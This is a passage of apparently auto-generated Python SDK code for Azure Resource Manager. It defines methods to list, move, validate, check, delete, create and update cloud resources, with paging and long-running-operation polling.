    # that this generated operation group targets.
    self.config = config
    self._client = client
    self._serialize = serializer
    self._deserialize = deserializer
    self.api_version = "2019-08-01"
def list_by_resource_group(
        self, resource_group_name, filter=None, expand=None, top=None, custom_headers=None, raw=False, **operation_config):
    """Get all the resources for a resource group.

    :param resource_group_name: The resource group with the resources to
     get.
    :type resource_group_name: str
    :param filter: The filter to apply on the operation.<br><br>The
     properties you can use for eq (equals) or ne (not equals) are:
     location, resourceType, name, resourceGroup, identity,
     identity/principalId, plan, plan/publisher, plan/product, plan/name,
     plan/version, and plan/promotionCode.<br><br>For example, to filter by
     a resource type, use: $filter=resourceType eq
     'Microsoft.Network/virtualNetworks'<br><br>You can use
     substringof(value, property) in the filter. The properties you can use
     for substring are: name and resourceGroup.<br><br>For example, to get
     all resources with 'demo' anywhere in the name, use:
     $filter=substringof('demo', name)<br><br>You can link more than one
     substringof together by adding and/or operators.<br><br>You can filter
     by tag names and values. For example, to filter for a tag name and
     value, use $filter=tagName eq 'tag1' and tagValue eq 'Value1'. When
     you filter by a tag name and value, the tags for each resource are not
     returned in the results.<br><br>You can use some properties together
     when filtering. The combinations you can use are: substringof and/or
     resourceType, plan and plan/publisher and plan/name, identity and
     identity/principalId.
    :type filter: str
    :param expand: The $expand query parameter. You can expand createdTime
     and changedTime. For example, to expand both properties, use
     $expand=changedTime,createdTime
    :type expand: str
    :param top: The number of results to return. If null is passed,
     returns all resources.
    :type top: int
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: An iterator like instance of GenericResource
    :rtype:
     ~azure.mgmt.resource.resources.v2019_08_01.models.GenericResourcePaged[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    def prepare_request(next_link=None):
        # First page: build the URL from the operation's metadata template.
        # Subsequent pages: the service-supplied nextLink already embeds all
        # query parameters, so none are re-added.
        if not next_link:
            # Construct URL
            url = self.list_by_resource_group.metadata['url']
            path_format_arguments = {
                'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
                'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
            }
            url = self._client.format_url(url, **path_format_arguments)

            # Construct parameters (only those the caller actually supplied)
            query_parameters = {}
            if filter is not None:
                query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
            if expand is not None:
                query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
            if top is not None:
                query_parameters['$top'] = self._serialize.query("top", top, 'int')
            query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        else:
            url = next_link
            query_parameters = {}

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        return request

    def internal_paging(next_link=None):
        # Invoked lazily by the paged iterator each time a new page is needed.
        request = prepare_request(next_link)

        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        return response

    # Deserialize response into a lazily-evaluated paged collection.
    header_dict = None
    if raw:
        header_dict = {}
    deserialized = models.GenericResourcePaged(internal_paging, self._deserialize.dependencies, header_dict)

    return deserialized
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/resources'}
def _move_resources_initial(
        self, source_resource_group_name, resources=None, target_resource_group=None, custom_headers=None, raw=False, **operation_config):
    # Internal helper: issues the POST that starts the move operation and
    # returns once the service has accepted (202) or completed (204) it.
    # Polling to completion is handled by move_resources.
    parameters = models.ResourcesMoveInfo(resources=resources, target_resource_group=target_resource_group)

    # Construct URL
    url = self.move_resources.metadata['url']
    path_format_arguments = {
        'sourceResourceGroupName': self._serialize.url("source_resource_group_name", source_resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct body
    body_content = self._serialize.body(parameters, 'ResourcesMoveInfo')

    # Construct and send request
    request = self._client.post(url, query_parameters, header_parameters, body_content)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [202, 204]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    # No payload on success; return the raw response only when requested.
    if raw:
        client_raw_response = ClientRawResponse(None, response)
        return client_raw_response
def move_resources(
        self, source_resource_group_name, resources=None, target_resource_group=None, custom_headers=None, raw=False, polling=True, **operation_config):
    """Moves resources from one resource group to another resource group.

    The resources to move must be in the same source resource group. The
    target resource group may be in a different subscription. When moving
    resources, both the source group and the target group are locked for
    the duration of the operation. Write and delete operations are blocked
    on the groups until the move completes.

    :param source_resource_group_name: The name of the resource group
     containing the resources to move.
    :type source_resource_group_name: str
    :param resources: The IDs of the resources.
    :type resources: list[str]
    :param target_resource_group: The target resource group.
    :type target_resource_group: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: The poller return type is ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for personal polling strategy
    :return: An instance of LROPoller that returns None or
     ClientRawResponse<None> if raw==True
    :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
     ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Kick off the long-running operation; raw=True keeps the pipeline
    # response so the poller can follow the operation's status URL.
    raw_result = self._move_resources_initial(
        source_resource_group_name=source_resource_group_name,
        resources=resources,
        target_resource_group=target_resource_group,
        custom_headers=custom_headers,
        raw=True,
        **operation_config
    )

    def get_long_running_output(response):
        # The operation has no body on success; only surface the raw
        # response when the caller asked for it.
        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    # Select the polling strategy: default ARM LRO polling, no polling,
    # or a caller-supplied polling object.
    if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False: polling_method = NoPolling()
    else: polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
move_resources.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{sourceResourceGroupName}/moveResources'}
def _validate_move_resources_initial(
        self, source_resource_group_name, resources=None, target_resource_group=None, custom_headers=None, raw=False, **operation_config):
    # Internal helper: issues the POST that starts move validation and
    # returns once the service has accepted (202) or completed (204) it.
    # Polling to completion is handled by validate_move_resources.
    parameters = models.ResourcesMoveInfo(resources=resources, target_resource_group=target_resource_group)

    # Construct URL
    url = self.validate_move_resources.metadata['url']
    path_format_arguments = {
        'sourceResourceGroupName': self._serialize.url("source_resource_group_name", source_resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct body
    body_content = self._serialize.body(parameters, 'ResourcesMoveInfo')

    # Construct and send request
    request = self._client.post(url, query_parameters, header_parameters, body_content)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [202, 204]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    # No payload on success; return the raw response only when requested.
    if raw:
        client_raw_response = ClientRawResponse(None, response)
        return client_raw_response
def validate_move_resources(
        self, source_resource_group_name, resources=None, target_resource_group=None, custom_headers=None, raw=False, polling=True, **operation_config):
    """Validates whether resources can be moved from one resource group to
    another resource group.

    This operation checks whether the specified resources can be moved to
    the target. The resources to move must be in the same source resource
    group. The target resource group may be in a different subscription. If
    validation succeeds, it returns HTTP response code 204 (no content). If
    validation fails, it returns HTTP response code 409 (Conflict) with an
    error message. Retrieve the URL in the Location header value to check
    the result of the long-running operation.

    :param source_resource_group_name: The name of the resource group
     containing the resources to validate for move.
    :type source_resource_group_name: str
    :param resources: The IDs of the resources.
    :type resources: list[str]
    :param target_resource_group: The target resource group.
    :type target_resource_group: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: The poller return type is ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for personal polling strategy
    :return: An instance of LROPoller that returns None or
     ClientRawResponse<None> if raw==True
    :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
     ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Kick off the long-running validation; raw=True keeps the pipeline
    # response so the poller can follow the operation's status URL.
    raw_result = self._validate_move_resources_initial(
        source_resource_group_name=source_resource_group_name,
        resources=resources,
        target_resource_group=target_resource_group,
        custom_headers=custom_headers,
        raw=True,
        **operation_config
    )

    def get_long_running_output(response):
        # Validation has no body on success; only surface the raw
        # response when the caller asked for it.
        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    # Select the polling strategy: default ARM LRO polling, no polling,
    # or a caller-supplied polling object.
    if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False: polling_method = NoPolling()
    else: polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
validate_move_resources.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{sourceResourceGroupName}/validateMoveResources'}
def list(
        self, filter=None, expand=None, top=None, custom_headers=None, raw=False, **operation_config):
    """Get all the resources in a subscription.

    :param filter: The filter to apply on the operation.<br><br>The
     properties you can use for eq (equals) or ne (not equals) are:
     location, resourceType, name, resourceGroup, identity,
     identity/principalId, plan, plan/publisher, plan/product, plan/name,
     plan/version, and plan/promotionCode.<br><br>For example, to filter by
     a resource type, use: $filter=resourceType eq
     'Microsoft.Network/virtualNetworks'<br><br>You can use
     substringof(value, property) in the filter. The properties you can use
     for substring are: name and resourceGroup.<br><br>For example, to get
     all resources with 'demo' anywhere in the name, use:
     $filter=substringof('demo', name)<br><br>You can link more than one
     substringof together by adding and/or operators.<br><br>You can filter
     by tag names and values. For example, to filter for a tag name and
     value, use $filter=tagName eq 'tag1' and tagValue eq 'Value1'. When
     you filter by a tag name and value, the tags for each resource are not
     returned in the results.<br><br>You can use some properties together
     when filtering. The combinations you can use are: substringof and/or
     resourceType, plan and plan/publisher and plan/name, identity and
     identity/principalId.
    :type filter: str
    :param expand: The $expand query parameter. You can expand createdTime
     and changedTime. For example, to expand both properties, use
     $expand=changedTime,createdTime
    :type expand: str
    :param top: The number of results to return. If null is passed,
     returns all resources.
    :type top: int
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: An iterator like instance of GenericResource
    :rtype:
     ~azure.mgmt.resource.resources.v2019_08_01.models.GenericResourcePaged[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    def prepare_request(next_link=None):
        # First page: build the URL from the operation's metadata template.
        # Subsequent pages: the service-supplied nextLink already embeds all
        # query parameters, so none are re-added.
        if not next_link:
            # Construct URL
            url = self.list.metadata['url']
            path_format_arguments = {
                'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
            }
            url = self._client.format_url(url, **path_format_arguments)

            # Construct parameters (only those the caller actually supplied)
            query_parameters = {}
            if filter is not None:
                query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
            if expand is not None:
                query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
            if top is not None:
                query_parameters['$top'] = self._serialize.query("top", top, 'int')
            query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        else:
            url = next_link
            query_parameters = {}

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        return request

    def internal_paging(next_link=None):
        # Invoked lazily by the paged iterator each time a new page is needed.
        request = prepare_request(next_link)

        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        return response

    # Deserialize response into a lazily-evaluated paged collection.
    header_dict = None
    if raw:
        header_dict = {}
    deserialized = models.GenericResourcePaged(internal_paging, self._deserialize.dependencies, header_dict)

    return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/resources'}
def check_existence(
        self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, custom_headers=None, raw=False, **operation_config):
    """Checks whether a resource exists.

    :param resource_group_name: The name of the resource group containing
     the resource to check. The name is case insensitive.
    :type resource_group_name: str
    :param resource_provider_namespace: The resource provider of the
     resource to check.
    :type resource_provider_namespace: str
    :param parent_resource_path: The parent resource identity.
    :type parent_resource_path: str
    :param resource_type: The resource type.
    :type resource_type: str
    :param resource_name: The name of the resource to check whether it
     exists.
    :type resource_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: bool or ClientRawResponse if raw=true
    :rtype: bool or ~msrest.pipeline.ClientRawResponse
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Construct URL
    url = self.check_existence.metadata['url']
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
        'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str'),
        'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
        'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
        'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

    # Construct headers
    header_parameters = {}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct and send request (HEAD: existence probe, no response body)
    request = self._client.head(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [204, 404]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    # 204 No Content means the resource exists; 404 means it does not.
    deserialized = (response.status_code == 204)

    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response
    return deserialized
check_existence.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}'}
def _delete_initial(
        self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, custom_headers=None, raw=False, **operation_config):
    # Internal helper: issues the DELETE that starts the operation and
    # returns once the service has responded 200/202/204. Polling to
    # completion is handled by delete.

    # Construct URL
    url = self.delete.metadata['url']
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
        'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str'),
        'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
        'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
        'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

    # Construct headers
    header_parameters = {}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct and send request
    request = self._client.delete(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [200, 202, 204]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    # No payload on success; return the raw response only when requested.
    if raw:
        client_raw_response = ClientRawResponse(None, response)
        return client_raw_response
def delete(
        self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, custom_headers=None, raw=False, polling=True, **operation_config):
    """Deletes a resource.

    :param resource_group_name: The name of the resource group that
     contains the resource to delete. The name is case insensitive.
    :type resource_group_name: str
    :param resource_provider_namespace: The namespace of the resource
     provider.
    :type resource_provider_namespace: str
    :param parent_resource_path: The parent resource identity.
    :type parent_resource_path: str
    :param resource_type: The resource type.
    :type resource_type: str
    :param resource_name: The name of the resource to delete.
    :type resource_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: The poller return type is ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for personal polling strategy
    :return: An instance of LROPoller that returns None or
     ClientRawResponse<None> if raw==True
    :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
     ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Kick off the long-running delete; raw=True keeps the pipeline
    # response so the poller can follow the operation's status URL.
    raw_result = self._delete_initial(
        resource_group_name=resource_group_name,
        resource_provider_namespace=resource_provider_namespace,
        parent_resource_path=parent_resource_path,
        resource_type=resource_type,
        resource_name=resource_name,
        custom_headers=custom_headers,
        raw=True,
        **operation_config
    )

    def get_long_running_output(response):
        # Delete has no body on success; only surface the raw response
        # when the caller asked for it.
        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    # Select the polling strategy: default ARM LRO polling, no polling,
    # or a caller-supplied polling object.
    if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False: polling_method = NoPolling()
    else: polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}'}
def _create_or_update_initial(
        self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, parameters, custom_headers=None, raw=False, **operation_config):
    # Internal helper: issues the PUT that starts the create/update.
    # 200/201 carry the resource body; 202 means the operation is still
    # running and the poller (create_or_update) resolves the final state.

    # Construct URL
    url = self.create_or_update.metadata['url']
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
        'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str'),
        'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
        'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
        'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Accept'] = 'application/json'
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct body
    body_content = self._serialize.body(parameters, 'GenericResource')

    # Construct and send request
    request = self._client.put(url, query_parameters, header_parameters, body_content)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [200, 201, 202]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    # 202 Accepted leaves deserialized as None; the long-running poller
    # retrieves the final GenericResource.
    deserialized = None

    if response.status_code == 200:
        deserialized = self._deserialize('GenericResource', response)
    if response.status_code == 201:
        deserialized = self._deserialize('GenericResource', response)

    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response

    return deserialized
def create_or_update(
        self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
    """Creates a resource.

    :param resource_group_name: The name of the resource group for the
     resource. The name is case insensitive.
    :type resource_group_name: str
    :param resource_provider_namespace: The namespace of the resource
     provider.
    :type resource_provider_namespace: str
    :param parent_resource_path: The parent resource identity.
    :type parent_resource_path: str
    :param resource_type: The resource type of the resource to create.
    :type resource_type: str
    :param resource_name: The name of the resource to create.
    :type resource_name: str
    :param parameters: Parameters for creating or updating the resource.
    :type parameters:
     ~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: The poller return type is ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for personal polling strategy
    :return: An instance of LROPoller that returns GenericResource or
     ClientRawResponse<GenericResource> if raw==True
    :rtype:
     ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
     or
     ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Send the initial PUT; raw=True so the poller below receives the raw
    # HTTP response it needs to track the long-running operation.
    raw_result = self._create_or_update_initial(
        resource_group_name=resource_group_name,
        resource_provider_namespace=resource_provider_namespace,
        parent_resource_path=parent_resource_path,
        resource_type=resource_type,
        resource_name=resource_name,
        parameters=parameters,
        custom_headers=custom_headers,
        raw=True,
        **operation_config
    )

    def get_long_running_output(response):
        # Called by the poller with the terminal response.
        deserialized = self._deserialize('GenericResource', response)
        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response
        return deserialized

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    # Polling strategy: default ARM polling, no polling, or a caller-supplied
    # polling object.
    if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False: polling_method = NoPolling()
    else: polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}'}
def _update_initial(
        self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, parameters, custom_headers=None, raw=False, **operation_config):
    # Builds and sends the initial PATCH request of the long-running update
    # operation; the public `update` method wraps this with an LRO poller.
    # Construct URL
    url = self.update.metadata['url']
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
        'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str'),
        'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
        'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
        'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Accept'] = 'application/json'
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct body
    body_content = self._serialize.body(parameters, 'GenericResource')

    # Construct and send request
    request = self._client.patch(url, query_parameters, header_parameters, body_content)
    response = self._client.send(request, stream=False, **operation_config)

    # 200 = update finished synchronously, 202 = accepted and still running.
    if response.status_code not in [200, 202]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('GenericResource', response)

    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response

    return deserialized
def update(
        self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
    """Updates a resource.

    :param resource_group_name: The name of the resource group for the
     resource. The name is case insensitive.
    :type resource_group_name: str
    :param resource_provider_namespace: The namespace of the resource
     provider.
    :type resource_provider_namespace: str
    :param parent_resource_path: The parent resource identity.
    :type parent_resource_path: str
    :param resource_type: The resource type of the resource to update.
    :type resource_type: str
    :param resource_name: The name of the resource to update.
    :type resource_name: str
    :param parameters: Parameters for updating the resource.
    :type parameters:
     ~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: The poller return type is ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for personal polling strategy
    :return: An instance of LROPoller that returns GenericResource or
     ClientRawResponse<GenericResource> if raw==True
    :rtype:
     ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
     or
     ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Send the initial PATCH; raw=True so the poller below receives the raw
    # HTTP response it needs to track the long-running operation.
    raw_result = self._update_initial(
        resource_group_name=resource_group_name,
        resource_provider_namespace=resource_provider_namespace,
        parent_resource_path=parent_resource_path,
        resource_type=resource_type,
        resource_name=resource_name,
        parameters=parameters,
        custom_headers=custom_headers,
        raw=True,
        **operation_config
    )

    def get_long_running_output(response):
        # Called by the poller with the terminal response.
        deserialized = self._deserialize('GenericResource', response)
        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response
        return deserialized

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    # Polling strategy: default ARM polling, no polling, or a caller-supplied
    # polling object.
    if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False: polling_method = NoPolling()
    else: polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}'}
def get(
        self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, custom_headers=None, raw=False, **operation_config):
    """Gets a resource.

    :param resource_group_name: The name of the resource group containing
     the resource to get. The name is case insensitive.
    :type resource_group_name: str
    :param resource_provider_namespace: The namespace of the resource
     provider.
    :type resource_provider_namespace: str
